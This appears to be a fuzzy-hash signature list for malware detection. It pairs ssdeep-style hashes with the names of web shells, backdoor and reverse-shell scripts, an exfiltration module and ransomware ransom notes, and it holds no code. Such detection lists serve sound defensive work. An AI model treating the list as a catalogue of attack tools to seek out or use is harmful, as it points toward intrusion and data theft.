+24:lwvjejSR2cyAOkHjlaTbVNcB+REeQ2bxkZYFR:6jeuRJysHjMcmEWuU,"SimpleReport.py"
+24:lwvjejSR2cyAOkHjlaTbVNcB+lAmK6qZEne9hDEc0e9ie9v:6jeuRJysHjMcGfch,"ReportManager.py"
+24:lwvjejSR2cyAOkHjlaTbVNcB+7A83CAzjmmmp3mPDVXwEDnQO:6jeuRJysHjMcy8kjmmmt/A,"Response.py"
+24:lwvjejSR2cyAOkHjlaTbVNcB+57jeA6C1A335YEhuNa5vgEhuL9A5PreEhuv5NEc:6jeuRJysHjMcY7qOIJwevxzjQ2i,"DefaultConfigParser.py"
+24:lwvjejSR2cyAOkHjlaTbVNcB+2eAjwvdsZkBmen98v6o398vPDOZEIh+cEjKTMn/:6jeuRJysHjMc24wwmiP3iDXIM5OgzZjv,"BaseReport.py"
+24:LlbJ4ohbNCoat0pS4k4JKL424KbpLA25/KMm7vW2jBh0glnvq3DgjPOZ9fpbBGac:LTHpaC/nJTd+pfAJthRqQaeGon,"exec.aspx"
+24:LGPTbBw/3Kq4Fq+hDCnP+mo2INhl4hTuh2KCioW/gv1jNK69kKqQHPrhPqohpSe7:ybbBw/3KzFq+NaxovNhl48h2lioxv1Jp,"fd431475f731ba44b11677f635d71760_php.txt"
+24:lgi5M5M1kBTSezN8ou2UJyafHcJNfqO5tr0MeUe5kpFn:6i5MW17eJ8o0yUIS4OM8k7,"HTTP CODE Header Backdoor Command Shell - client.py"
+24:lfukkmNK4DaSF1VUCXKJXXOyTEqdhaXpqeQxSML8CFgXw+34w4PSkAwjZeNe0vM8:lfN2S/VhXKJXXXEqdhcgh8k+LpMBC,"wh_bindshell.py.txt"
+24:lbZwUWT2ImvcYSJgSqYvcamo3cLD5/8+n2DIzEhA7kT2TAtEDhtKkXPHS8DbDR1X:lbnzvpyPRc35kGCW8Ee2TAtEDht1f7LX,"bpscan.py"
+24:l7ACPZrZk/bZM8MP5YvpCP+a2PXSc14iwCzh7cYzxCZHDcbAXei63:F9k3CmPBWSt76HYbkel3,"ASP一句话.txt"
+24:l6KDjDWyXDTDTDbDLDH+DiqDLDzD/D2DLDyDOT/DLDPDLDaDXD7DLDK:z,"2016-07-29-EITest-campaign-CrypMIC-decrypt-instructions.BMP"
+24:l6KDjDWyXDTDTDbDLDH+DiqDLDzD/D2DLDyDOT/DLDPDLDaDqD7DLDC:w,"2016-08-12-pseudoDarkleech-CrypMIC-decrypt-instructions.BMP"
+24:l6KDjDWyXDTDTDbDLDH+DiqDLDzD/D2DLDyDOT/DLDPDLDaDKD7DLDC:Q,"2016-08-01-pseudoDarkleech-CrypMIC-decrypt-instructions.BMP"
+24:l6KDjDWyXDTDTDbDLDH+DiqDLDzD/D2DLDyDOT/DLDPDLDaDHD7DLDC:b,"2016-08-18-pseudoDarkleech-CrypMIC-decrypt-instructions.BMP~"
+24:l6KDjDWyXDTDTDbDLDH+DiqDLDzD/D2DLDyDOT/DLDPDLDaDaD7DLDK:o,"2016-08-05-EITest-CrypMIC-decrypt-instructions.BMP"
+24:l6KDjDWyXDTDTDbDLDH+DiqDLDzD/D2DLDyDOT/DLDPDLDaDaD7DLDC:g,"2016-07-28-pseudoDarkleech-campaign-CrypMIC-decrypt-instructions.BMP"
+24:l6KDjDWyXDTDTDbDLDH+DiqDLDzD/D2DLDyDOT/DLDPDLDaD3D7DLDK:T,"2016-08-11-EITest-CrypMIC-decrypt-instructions.BMP"
+24:L610oNJ9uBz8v5K2CltzcJlJ5JcoxOtoNAb77XAGuyhLERhL3NxYi:WFTuf2+FcLJwCOtoNy7o5HNxYi,"list.asp"
+24:L3a5h0Qk5HMGigeY2usR5/FJYH2SGSvkLxYOoiKZzp28W86oqrHPp1Yg4:7acQk5sGi5Y63FJYH2PYCmVeDPkg4,"phpInjectionShell.php"
+24:L3a5h0Qk5HMFHeQl75lWLNhsYfN3Np11zJ:7acQk5s1eK83sYfNd9N,"Ru24PostWebShell.php"
+24:L2rLyhpX1n2DpRwuwfskZXFzVeNsxr2Rly2eB1zVq3XlE2RwGs:L2rLmjCcuw0kLJ3rGy/VVqGvGs,"bill.txt"
+24:KxVjfgGaRbrTpkCQ5iTmLiLwn2DrRwsyLECLzMLP11v/zv9H:wV7QdfQiYCCsVX/ZH,"ir-pwn.php"
+24:kvhmN/RDhon16QBPoXXFTKLJjXvbaalMkmdkAr3oa6N7IDUJDyzeesOQInNhI:U6o19oTKl/baoMljoa6ZiUaeSQm0,"Backdoor.ASP.XpFox.a.asp"
+24:kqwo6QFZkvx6e2TXf9MFqaGKyuor4iuAZCh3uy/7zR0jjWsa2efj:Uo5FZPBMkuW4dp3Otw,"webshell.asp"
+24:KLOoALOzXcEL4oMaMLLPzSYNUL0qpOeooxoeMNLxLJ/LMLzpH:Z4IRoNIzSYzEzoox5SY,"php_curl.tpl"
+24:KJIA+AbeNGRRVZBRRd6cRRHPMRRVZhdCPwoRRVZeXRRVZTmRRVZnQi+ZWum8g5jo:KJxSGBZBUcb0BZCZBZeXBZTmBZnHwEq1,"braintree-backdoor"
+24:kIo2SHNCFhqllMrnC7cjiNeI1fMuuojKls6UeWTOFKls6UeWDC7RAdnb:A2GNkq8oeIEGjKls6U3TOFKls6U3AS1,"idr"
+24:kfobPcGPmXvuH6dcFTGPmXvuH6dc4H6dcZ1Mpn6+YvKsLKPXVwuHENNTj:XrcCgMQsCgMQfQu1M5XW0SNv,"id.flv"
+24:kExXY23IldgfHw8Hluy8qu/WsyCIPDrvVd2KMUqNOa:dxL3Kg/w8Fuy8Ty7fc,"upload.py"
+24:ke+7p/Duqu8i3iVs1kPwl1J7XfEbqOt97HeEmvUBYBOZsHWu0ACajYIo9mLL:keSp/DuqA3iVs1mwlbfEbRrHTIHWczXL,"stegaref_php.tpl"
+24:kBMinbfFE8dAV5mJ4oYdRR3bCC9dF42GKamFLxQ125dL5Mug:kBnnzdaugdRRbHHmAqug,"README_DECRYPT_HYDRA_ID_12345678.txt"
+24:k49TOAZ8IhsuCveg5I2JSd/NeKmHD2WOCgR1dYiOQxfF:ZdWGgP4eIHdYiOQtF,"index.cgi"
+24:k3iymIsYv5WuVLZoSnWNvufWFgGQFxR95CI:mx5WuF/W0f2gJDH,"idsuper.txt.33"
+24:k3iymIsYv5WuVLzF/GLHNWFgGQFxR95CI:mx5WuFzF2t2gJDH,"idsuper.txt.087"
+24:k3iymIsYv5WuVLyYu6QEhbjyWFgGQFxR95CI:mx5WuFS6Qybjy2gJDH,"idsuper.txt.192"
+24:k3iymIsYv5WuVLYCz5piEWFgGQFxR95CI:mx5WuFY2pF2gJDH,"idsuper.txt.069"
+24:k3iymIsYv5WuVLyAR2/HpWFgGQFxR95CI:mx5WuFTRmJ2gJDH,"idsuper.txt.003"
+24:k3iymIsYv5WuVLy92xIL+WFgGQFxR95CI:mx5WuFy9Hy2gJDH,"idsuper.txt.125"
+24:k3iymIsYv5WuVLWqHTVkT6WFgGQFxR95CI:mx5WuFlJg62gJDH,"idsuper.txt.028"
+24:k3iymIsYv5WuVLwNLAYjDWFgGQFxR95CI:mx5WuFwFf2gJDH,"idsuper.txt.169"
+24:k3iymIsYv5WuVLW/jnUJhWFgGQFxR95CI:mx5WuFWbnq2gJDH,"idsuper.txt.19.001"
+24:k3iymIsYv5WuVLwDzpOjhnX+WFgGQFxR95CI:mx5WuFUIlu2gJDH,"idsuper.txt.31"
+24:k3iymIsYv5WuVLVpbZbkeWFgGQFxR95CI:mx5WuFV4e2gJDH,"idsuper.txt.018"
+24:k3iymIsYv5WuVLVKWx7GwWFgGQFxR95CI:mx5WuF4bw2gJDH,"idsuper.txt.34"
+24:k3iymIsYv5WuVLVfSAT7lkWFgGQFxR95CI:mx5WuFrTO2gJDH,"idsuper.txt.082"
+24:k3iymIsYv5WuVLVDDHsI/CeKWFgGQFxR95CI:mx5WuFpDMIq2gJDH,"idsuper.txt.17"
+24:k3iymIsYv5WuVLux/SJHX6WFgGQFxR95CI:mx5WuFY/SJq2gJDH,"idsuper.txt.224"
+24:k3iymIsYv5WuVLUWEDAz13U1zWFgGQFxR95CI:mx5WuF2WhU1z2gJDH,"idsuper.txt.7"
+24:k3iymIsYv5WuVLuRf+tLSTXxpWFgGQFxR95CI:mx5WuFu2WTXv2gJDH,"idsuper.txt.226"
+24:k3iymIsYv5WuVLUjy1BMcukQRWFgGQFxR95CI:mx5WuF5G72gJDH,"idsuper.txt.032"
+24:k3iymIsYv5WuVL+UGzr5AWFgGQFxR95CI:mx5WuFm5A2gJDH,"idsuper.txt.29"
+24:k3iymIsYv5WuVLUDeRLbUWFgGQFxR95CI:mx5WuFLRPU2gJDH,"idsuper.txt.182"
+24:k3iymIsYv5WuVLU1V1SXVNiWFgGQFxR95CI:mx5WuFUzkX+2gJDH,"idsuper.txt.220"
+24:k3iymIsYv5WuVLtqkyZPN0WFgGQFxR95CI:mx5WuF0Y2gJDH,"idsuper.txt.30"
+24:k3iymIsYv5WuVLtN3S/sn9U0WFgGQFxR95CI:mx5WuF/3S/s72gJDH,"idsuper.txt.243"
+24:k3iymIsYv5WuVLTgo/UhMWFgGQFxR95CI:mx5WuFTgo8hM2gJDH,"idsuper.txt.42"
+24:k3iymIsYv5WuVLtenxDpVWFgGQFxR95CI:mx5WuFtedpV2gJDH,"idsuper.txt.147"
+24:k3iymIsYv5WuVLTcfzGT2WFgGQFxR95CI:mx5WuFT2F2gJDH,"idsuper.txt.080"
+24:k3iymIsYv5WuVLt0xSRQNIKWFgGQFxR95CI:mx5WuF2d2gJDH,"idsuper.txt.1"
+24:k3iymIsYv5WuVLsZwEBk/cWFgGQFxR95CI:mx5WuFkO/c2gJDH,"idsuper.txt.177"
+24:k3iymIsYv5WuVLSmxckTx8WFgGQFxR95CI:mx5WuFdj+2gJDH,"idsuper.txt.160"
+24:k3iymIsYv5WuVLSgA61BhWFgGQFxR95CI:mx5WuF1Bh2gJDH,"idsuper.txt.117"
+24:k3iymIsYv5WuVLSbjxHIVI1xWFgGQFxR95CI:mx5WuFSbtHEI72gJDH,"idsuper.txt.21"
+24:k3iymIsYv5WuVLSbjdo69WFgGQFxR95CI:mx5WuFm52gJDH,"idsuper.txt.198"
+24:k3iymIsYv5WuVLS4Um2lRQ/GWFgGQFxR95CI:mx5WuFcm2lRF2gJDH,"idsuper.txt.259"
+24:k3iymIsYv5WuVLS4iEX7OeWFgGQFxR95CI:mx5WuFS4H7Oe2gJDH,"idsuper.txt.188"
+24:k3iymIsYv5WuVLs3SvoTUWFgGQFxR95CI:mx5WuFTqU2gJDH,"idsuper.txt.068"
+24:k3iymIsYv5WuVLRvvrZa5WFgGQFxR95CI:mx5WuFRVa52gJDH,"idsuper.txt.21.001"
+24:k3iymIsYv5WuVLRsaD8PzatKWFgGQFxR95CI:mx5WuFRgwK2gJDH,"idsuper.txt.219"
+24:k3iymIsYv5WuVLR/S4SYxKWFgGQFxR95CI:mx5WuFR/mY42gJDH,"idsuper.txt.277"
+24:k3iymIsYv5WuVL/RNsLRekLWFgGQFxR95CI:mx5WuFZNAb2gJDH,"idsuper.txt.099"
+24:k3iymIsYv5WuVLRiBTAYFaY8WFgGQFxR95CI:mx5WuFQpAcG2gJDH,"idsuper.txt.32.001"
+24:k3iymIsYv5WuVL+Rh1Cb/WFgGQFxR95CI:mx5WuF+RA2gJDH,"idsuper.txt.231"
+24:k3iymIsYv5WuVLRdl36z6WFgGQFxR95CI:mx5WuFu62gJDH,"idsuper.txt.172"
+24:k3iymIsYv5WuVLRB/wxRrWFgGQFxR95CI:mx5WuFRB/ORr2gJDH,"idsuper.txt.148"
+24:k3iymIsYv5WuVLRAKMA+Dj9WFgGQFxR95CI:mx5WuFWV512gJDH,"idsuper.txt.026"
+24:k3iymIsYv5WuVLqzaJm3pWFgGQFxR95CI:mx5WuFxJm52gJDH,"idsuper.txt.175"
+24:k3iymIsYv5WuVLqsR0QoQKWFgGQFxR95CI:mx5WuFqsGBQK2gJDH,"idsuper.txt.202"
+24:k3iymIsYv5WuVLqqqLMgNWFgGQFxR95CI:mx5WuFqf2gJDH,"idsuper.txt.1.014"
+24:k3iymIsYv5WuVLqDgTYMWWFgGQFxR95CI:mx5WuFq72gJDH,"idsuper.txt.30.001"
+24:k3iymIsYv5WuVLQAe+0rFWFgGQFxR95CI:mx5WuFQAq52gJDH,"idsuper.txt.178"
+24:k3iymIsYv5WuVLPzKpKthWFgGQFxR95CI:mx5WuFbn2gJDH,"idsuper.txt.014"
+24:k3iymIsYv5WuVLPUfb6xAFpWFgGQFxR95CI:mx5WuF4Pp2gJDH,"idsuper.txt.064"
+24:k3iymIsYv5WuVLptPSocu0WFgGQFxR95CI:mx5WuFptk2gJDH,"idsuper.txt.9.001"
+24:k3iymIsYv5WuVLpOWhJo+8WFgGQFxR95CI:mx5WuFpPo+82gJDH,"idsuper.txt.247"
+24:k3iymIsYv5WuVLpiS5zxRWFgGQFxR95CI:mx5WuFEC72gJDH,"idsuper.txt.6.001"
+24:k3iymIsYv5WuVLnU0An7ohXbjWFgGQFxR95CI:mx5WuF/A7ohX32gJDH,"idsuper.txt.077"
+24:k3iymIsYv5WuVLns9RjziZWFgGQFxR95CI:mx5WuFn4FmZ2gJDH,"idsuper.txt.258"
+24:k3iymIsYv5WuVLNpkbhppE88zWFgGQFxR95CI:mx5WuFEZnK2gJDH,"idsuper.txt.078"
+24:k3iymIsYv5WuVLnI4g/gKWFgGQFxR95CI:mx5WuFny2gJDH,"idsuper.txt.053"
+24:k3iymIsYv5WuVLNgfDrV5dABVpWFgGQFxR95CI:mx5WuF+fDhDABVp2gJDH,"idsuper.txt.244"
+24:k3iymIsYv5WuVLnaVoh3wM9WFgGQFxR95CI:mx5WuFaVohgM92gJDH,"idsuper.txt.031"
+24:k3iymIsYv5WuVLm+T1Al44TAWFgGQFxR95CI:mx5WuFRAlnTA2gJDH,"idsuper.txt.251"
+24:k3iymIsYv5WuVL/+mFD37WFgGQFxR95CI:mx5WuF/jFH2gJDH,"idsuper.txt.230"
+24:k3iymIsYv5WuVLmdDTTLNhWFgGQFxR95CI:mx5WuFqPdh2gJDH,"idsuper.txt.181"
+24:k3iymIsYv5WuVLma5RVvzWFgGQFxR95CI:mx5WuFmI7z2gJDH,"idsuper.txt.20"
+24:k3iymIsYv5WuVLlfMLVc9WFgGQFxR95CI:mx5WuFlUM2gJDH,"idsuper.txt.008"
+24:k3iymIsYv5WuVL+l2YQxz1WFgGQFxR95CI:mx5WuF+l2Yez12gJDH,"idsuper.txt.059"
+24:k3iymIsYv5WuVLk6BXsqZVtT3GEfgWFgGQFxR95CI:mx5WuFk+1PVGV2gJDH,"idsuper.txt.033"
+24:k3iymIsYv5WuVLk4SJURaHG88WFgGQFxR95CI:mx5WuFr7RY382gJDH,"idsuper.txt.285"
+24:k3iymIsYv5WuVLjFAAaYSJWFgGQFxR95CI:mx5WuF0YSJ2gJDH,"idsuper.txt.26.001"
+24:k3iymIsYv5WuVLiwsRRzC8WFgGQFxR95CI:mx5WuFixI82gJDH,"idsuper.txt.196"
+24:k3iymIsYv5WuVLivYK4PAgWFgGQFxR95CI:mx5WuFiwv12gJDH,"idsuper.txt.195"
+24:k3iymIsYv5WuVLINwooDKWFgGQFxR95CI:mx5WuFICooe2gJDH,"idsuper.txt.45"
+24:k3iymIsYv5WuVLiiUVQnD9WFgGQFxR95CI:mx5WuFiiUVwD92gJDH,"idsuper.txt.211"
+24:k3iymIsYv5WuVLiC5M6+gKXWFgGQFxR95CI:mx5WuFit6+bX2gJDH,"idsuper.txt.1.011"
+24:k3iymIsYv5WuVLh+SQA5Md/WFgGQFxR95CI:mx5WuFw6c/2gJDH,"idsuper.txt.49"
+24:k3iymIsYv5WuVLHRyn1VVTKWFgGQFxR95CI:mx5WuFHaxu2gJDH,"idsuper.txt.048"
+24:k3iymIsYv5WuVLHPK4RGJ+9WFgGQFxR95CI:mx5WuFC4J92gJDH,"idsuper.txt.233"
+24:k3iymIsYv5WuVLH2crK1K8WFgGQFxR95CI:mx5WuFH2sKI82gJDH,"idsuper.txt.002"
+24:k3iymIsYv5WuVLh1x5RMEuWFgGQFxR95CI:mx5WuF/x5RMEu2gJDH,"idsuper.txt.212"
+24:k3iymIsYv5WuVLH1LAqkgWFgGQFxR95CI:mx5WuFV0Zg2gJDH,"idsuper.txt.092"
+24:k3iymIsYv5WuVLGw4KlTyD/pWFgGQFxR95CI:mx5WuFGwxK/p2gJDH,"idsuper.txt.050"
+24:k3iymIsYv5WuVLg2gOdA+zWFgGQFxR95CI:mx5WuFWyAA2gJDH,"idsuper.txt.163"
+24:k3iymIsYv5WuVLF5SnfxMKWFgGQFxR95CI:mx5WuFDk92gJDH,"idsuper.txt.1.001"
+24:k3iymIsYv5WuVLezBVy8RMSWFgGQFxR95CI:mx5WuFezvLMS2gJDH,"idsuper.txt.165"
+24:k3iymIsYv5WuVLeXX+oelnui6DvKWFgGQFxR95CI:mx5WuFu+r03Dy2gJDH,"idsuper.txt.242"
+24:k3iymIsYv5WuVLEWBYdjKWFgGQFxR95CI:mx5WuFFMjK2gJDH,"idsuper.txt.126"
+24:k3iymIsYv5WuVLErJyMFhWFgGQFxR95CI:mx5WuFEs22gJDH,"idsuper.txt.113"
+24:k3iymIsYv5WuVLeaFVBUt3WFgGQFxR95CI:mx5WuFea3+d2gJDH,"idsuper.txt.281"
+24:k3iymIsYv5WuVLDzRksJVWFgGQFxR95CI:mx5WuFHC62gJDH,"idsuper.txt.164"
+24:k3iymIsYv5WuVLdTYik0pWFgGQFxR95CI:mx5WuFb2gJDH,"idsuper.txt.246"
+24:k3iymIsYv5WuVLDNmurRSZZWFgGQFxR95CI:mx5WuFBV9S72gJDH,"idsuper.txt.067"
+24:k3iymIsYv5WuVLDMOqzF8WFgGQFxR95CI:mx5WuFDMRF82gJDH,"idsuper.txt.114"
+24:k3iymIsYv5WuVL/dEZSzm0krWFgGQFxR95CI:mx5WuFeZSZC2gJDH,"idsuper.txt.1.008"
+24:k3iymIsYv5WuVLdEMIm8lhRWFgGQFxR95CI:mx5WuFdGxj2gJDH,"idsuper.txt.139"
+24:k3iymIsYv5WuVLd6UoFrBWFgGQFxR95CI:mx5WuFdDo/2gJDH,"idsuper.txt.095"
+24:k3iymIsYv5WuVLCNtLe7JPpWFgGQFxR95CI:mx5WuFstK7Jx2gJDH,"idsuper.txt.201"
+24:k3iymIsYv5WuVLBwph+DV8WFgGQFxR95CI:mx5WuFiph+Dq2gJDH,"idsuper.txt.153"
+24:k3iymIsYv5WuVLbV/gf9CuWFgGQFxR95CI:mx5WuFxlu2gJDH,"idsuper.txt.041"
+24:k3iymIsYv5WuVLBv8PjC2WFgGQFxR95CI:mx5WuFB8Pr2gJDH,"idsuper.txt.16"
+24:k3iymIsYv5WuVLBuiJrgbAyAWFgGQFxR95CI:mx5WuFBuyrAAyA2gJDH,"idsuper.txt.134"
+24:k3iymIsYv5WuVLBe1gccVWFgGQFxR95CI:mx5WuFBeSc62gJDH,"idsuper.txt.200"
+24:k3iymIsYv5WuVLbCLzREAu5WFgGQFxR95CI:mx5WuFUzCR52gJDH,"idsuper.txt.190"
+24:k3iymIsYv5WuVLb9Y+j5BWFgGQFxR95CI:mx5WuFBl1B2gJDH,"idsuper.txt.255"
+24:k3iymIsYv5WuVLB59UgfLhWFgGQFxR95CI:mx5WuFB5VTh2gJDH,"idsuper.txt.071"
+24:k3iymIsYv5WuVLaXcbdZzWFgGQFxR95CI:mx5WuFecbP2gJDH,"idsuper.txt.001"
+24:k3iymIsYv5WuVLASLQAKmhWFgGQFxR95CI:mx5WuFAghh2gJDH,"idsuper.txt.185"
+24:k3iymIsYv5WuVLAJZQhg9WFgGQFxR95CI:mx5WuFY2gJDH,"idsuper.txt.062"
+24:k3iymIsYv5WuVL+aGchAoVCKWFgGQFxR95CI:mx5WuFDAowK2gJDH,"idsuper.txt.088"
+24:k3iymIsYv5WuVL9yw66weWFgGQFxR95CI:mx5WuF9e632gJDH,"idsuper.txt.186"
+24:k3iymIsYv5WuVL9094scmWFgGQFxR95CI:mx5WuFO9tcm2gJDH,"idsuper.txt.263"
+24:k3iymIsYv5WuVL8XepIiyGWFgGQFxR95CI:mx5WuF8uYG2gJDH,"idsuper.txt.1.015"
+24:k3iymIsYv5WuVL8il63jsBWFgGQFxR95CI:mx5WuFLoM2gJDH,"idsuper.txt.094"
+24:k3iymIsYv5WuVL86LaxkBWFgGQFxR95CI:mx5WuF8jkB2gJDH,"idsuper.txt.179"
+24:k3iymIsYv5WuVL7W150n3pWFgGQFxR95CI:mx5WuF7WI3p2gJDH,"idsuper.txt.052"
+24:k3iymIsYv5WuVL7T2lxnS6WFgGQFxR95CI:mx5WuF2lxr2gJDH,"idsuper.txt.075"
+24:k3iymIsYv5WuVL7R6Q4WhWFgGQFxR95CI:mx5WuF7dnh2gJDH,"idsuper.txt.33.001"
+24:k3iymIsYv5WuVL6yx5SePi/8WFgGQFxR95CI:mx5WuFW4X2gJDH,"idsuper.txt.280"
+24:k3iymIsYv5WuVL6MBDtHBWFgGQFxR95CI:mx5WuF6qh2gJDH,"idsuper.txt.278"
+24:k3iymIsYv5WuVL6lIICkds6pWFgGQFxR95CI:mx5WuFLgn2gJDH,"idsuper.txt.44"
+24:k3iymIsYv5WuVL6Dj21qx9WFgGQFxR95CI:mx5WuF6f2A2gJDH,"idsuper.txt.28.001"
+24:k3iymIsYv5WuVL+60WeM9WFgGQFxR95CI:mx5WuFvl2gJDH,"idsuper.txt.029"
+24:k3iymIsYv5WuVL5S7TZRgx8WFgGQFxR95CI:mx5WuF5SI+2gJDH,"idsuper.txt.54"
+24:k3iymIsYv5WuVL5M4+gXAMDWFgGQFxR95CI:mx5WuFm4VXAO2gJDH,"idsuper.txt.23.001"
+24:k3iymIsYv5WuVL5IRnTrMNWFgGQFxR95CI:mx5WuF5IRnMN2gJDH,"idsuper.txt.156"
+24:k3iymIsYv5WuVL58uPtfThWFgGQFxR95CI:mx5WuF58Gh2gJDH,"idsuper.txt.260"
+24:k3iymIsYv5WuVL4y2NlEE18WFgGQFxR95CI:mx5WuFr2UEi2gJDH,"idsuper.txt.248"
+24:k3iymIsYv5WuVL4wIFNRKWFgGQFxR95CI:mx5WuFc3K2gJDH,"idsuper.txt.159"
+24:k3iymIsYv5WuVL4VbnQg+WFgGQFxR95CI:mx5WuF8bQP2gJDH,"idsuper.txt.112"
+24:k3iymIsYv5WuVL4TBn0qMqZhXWFgGQFxR95CI:mx5WuFen0q/hX2gJDH,"idsuper.txt.245"
+24:k3iymIsYv5WuVL4kMHzwR4yD0A2WFgGQFxR95CI:mx5WuF94622gJDH,"idsuper.txt.16.001"
+24:k3iymIsYv5WuVL4iVLJOmEWFgGQFxR95CI:mx5WuFb9E2gJDH,"idsuper.txt.058"
+24:k3iymIsYv5WuVL4fW8OorWFgGQFxR95CI:mx5WuFmWbor2gJDH,"idsuper.txt.257"
+24:k3iymIsYv5WuVL4EDDvRIUWFgGQFxR95CI:mx5WuF8U2gJDH,"idsuper.txt.1.003"
+24:k3iymIsYv5WuVL4cVsQA8WFgGQFxR95CI:mx5WuFVK82gJDH,"idsuper.txt.187"
+24:k3iymIsYv5WuVL48ZWrgHsqWFgGQFxR95CI:mx5WuFbZSgHsq2gJDH,"idsuper.txt.060"
+24:k3iymIsYv5WuVL46tvAXP/WFgGQFxR95CI:mx5WuFbNYX2gJDH,"idsuper.txt.222"
+24:k3iymIsYv5WuVL44fH8udWFgGQFxR95CI:mx5WuFR72gJDH,"idsuper.txt.056"
+24:k3iymIsYv5WuVL42O/nxsT7WFgGQFxR95CI:mx5WuFn2gJDH,"idsuper.txt.102"
+24:k3iymIsYv5WuVL3HcEBzZWFgGQFxR95CI:mx5WuFsEBzZ2gJDH,"idsuper.txt.006"
+24:k3iymIsYv5WuVL2wCp+dQcQLWFgGQFxR95CI:mx5WuFPCkmcW2gJDH,"idsuper.txt.214"
+24:k3iymIsYv5WuVL1NuIZSrHWFgGQFxR95CI:mx5WuFjhSrH2gJDH,"idsuper.txt.098"
+24:k3iymIsYv5WuVL1L5OxAnVWFgGQFxR95CI:mx5WuFIa2gJDH,"idsuper.txt.32"
+24:k3iymIsYv5WuVL1h2tb18hWFgGQFxR95CI:mx5WuF1s38h2gJDH,"idsuper.txt.086"
+24:k3iymIsYv5WuVL0KH16BwBI4WFgGQFxR95CI:mx5WuF0KV6BOI42gJDH,"idsuper.txt.120"
+24:k3iymIsYv5WuVL09BJdmuWFgGQFxR95CI:mx5WuFkTt2gJDH,"idsuper.txt.13.001"
+24:k1xWRL3ykGeXdKLZpIt9KzF3U35nJYNXWM+m+1xIQOBifPxXE6U:k1xWhJGeX4Lo6UJJYgM+m+fK+VEH,"Copy-VSS.ps1"
+24:k+1U5VVYB1pe2TXfAtyV8FM5Y3Xb2igMt3uy/7BPniXxwPwA82V:kZWBxlVtYHqiTt3NqiwA82V,"CmdAsp-2.asp"
+24:jYy+3XdyYXnXt5u8MDvqhJKDayYXnX1gOyC3b8yZXiHV:jYy2you8MDvlDayigOyC4yqV,"bott929292.php.001"
+24:+jYjBOQaAS1x/UtcSA69ZytMKxJojPHREkuofWyIDbLp8:iYVOd1g8WZGMKHMPqkuofWjrp8,"Exfiltration.psd1"
+24:JsdwKDaNmMZMTwtXjqbzVYy/R6sCLTvLiDRcd4aNwJ4:iyK9MDtzqr6nvue4By,"redirect3.php"
+24:jqh4hkkdHHeG8D2MHtXH/d3s9eklG8D4gdHH5xrKxG8DCR2dHeZ:o+dH+G8RF3slG8DHZxrKxG8fg,"soak2.php"
+24:jQE51QMEMjm52FhMEQEUuFDLnPGJFBjprP:vQG9TGVrP,"readme.md"
+24:jN21DvxwpaedVwRwanw/W/OLcUHOXRUHmUp86c+CwndbUJgElJdbWf462MbiCV4Y:av/2LZJ2mwjMuCVf,"badness.php"
+24:jMuZbOIqXMNmlBeDgVzDxoKp9TeLMwRFNiyvccXJKv6tZct13GjB3fBNY8LX7BhX:jMW0ym3FRzh8MwhiyvlJKv64vc3fH7ci,"啊D小工具 - 目录读写检测 [ASPX版].aspx"
+24:jkqeYfgBrBnTNh2ZPmtVX3V/AV6PTjLv5:BenBrBaZPmt5l/AV6bjLR,"mal-jun3-4.txt"
+24:JekHIaQLmpHLJYZw4LzfIgwBqSStX/Xj30bt9q+TUlTxoLDivomYnU1bnUHw6z6E:w8IqZwwGsgCqSgXv7cqjzvoF++V,"jsp-reverse.jsp"
+24:JdZ4+KPRF3Mx4DtA5BlJtAZiZQ7rpPobpP7qnU35BMkE35BM2j35BHpP/nrlU6w:3dKP24SSrpPkpP5pgl5pPu,"DemoDLL.vcxproj.filters"
+24:JdZ4+KPRF3Mx4DtA5BlJtAZiZQ7rpP2gpP7qnU35BMkE35BMS35BM7v35BM235BN:3dKP24SSrpP2gpP5pgV4hXCVf5pPg,"NTFSParser.vcxproj.filters"
+24:JdZ4+KPRF3Mx4DtA5BlJtAZiZQ7rpP2gpP7qnU35BMkE35BHpP/nrxw:3dKP24SSrpP2gpP5pg5pPS,"LogonUser.vcxproj.filters"
+24:JdZ4+KPRF3Mx4DtA5BlJtAZiZQ7rpP2gpP7qnU35BMkE35BHpP/nrSTw:3dKP24SSrpP2gpP5pg5pPWc,"DemoExe_MD.vcxproj.filters"
+24:JdZ4+KPRF3Mx4DtA5BlJtAZiZQ7rpP2gpP7qnU35BMkE35BHpP/nrLuw:3dKP24SSrpP2gpP5pg5pPPj,"DemoExe_MDd.vcxproj.filters"
+24:JdZ4+KPRF3Mx4DtA5BlJtAZiZQ7rpP2gpP7qnU35BMkE35BHpP/nrldu6w:3dKP24SSrpP2gpP5pg5pPDm,"DemoDLL_RemoteProcess.vcxproj.filters"
+24:JdZ4+KPRF3Mx4DtA5BlJtAZiZQ7rpP2gpP7qnU35BMkE35BHpP/nrj6w:3dKP24SSrpP2gpP5pg5pP/,"NTFSParserDLL.vcxproj.filters"
+24:JdZ4+KPRF3Mx4DtA5BlJtAZiZQ7rpP2gpP7qnU35BMkE35BHpP/nr966w:3dKP24SSrpP2gpP5pg5pPo,"logon.vcxproj.filters"
+24:JdZ4+KPRF3Mx4DtA5BlJtAZiZQ7rpP2gpP7qnU35BMkE35BHpP/nr7Kuw:3dKP24SSrpP2gpP5pg5pPPQ,"ExeToInjectInTo.vcxproj.filters"
+24:jBJtEbcJSTJaeFaepqhJhfMJaeMlKae45MGGJlaeKlPanqh3anqhGw:9J8BkK47,"TreatAsPersistence.reg"
+24:IW34P4T+rirjTrjncUrvtjfVEmfHmZuy1Qf6GD7Nu:IWogTNcatjVE4HRymNDRu,"mail.py"
+24:Iq7qe+8MWFPyOC25N9Qh/EPamylY8gFGpM4XKVS2z9Y8rivOoN+OjjvkM:/OebC25shsiW8gFGi+D2Gv1jrv,"sqlclient.aspx"
+24:IGqSaSqNa5ZspbXNkuCGhGjm8TRQzWRpNlwY:IWLqNa5KpbXNkyhGvuEv,"404.php.~165~"
+24:IGqSaSFNb54spbcINkuCGhGjm8TRQzZipNlwKSjdKKoj9vXpvGW5W58l5G+4Z:IWLFNb57pbcINkyhGvuEHSjd8nvdkGlK,"404.php.~288~"
+24:IGqSaSFNb54spbcINkuCGhGjm8TRQzZipNlw6hSjdKKoj9vXpvGW5W58l5G+4Z:IWLFNb57pbcINkyhGvuEFSjd8nvdkGlK,"404.php.~289~"
+24:IGqSaSFNb54spbcINkuCGhGjm8TRQzZCpNlw6hSjdKKoj9vXpvGW5W58l5G+4Z:IWLFNb57pbcINkyhGvukFSjd8nvdkGlK,"404.php"
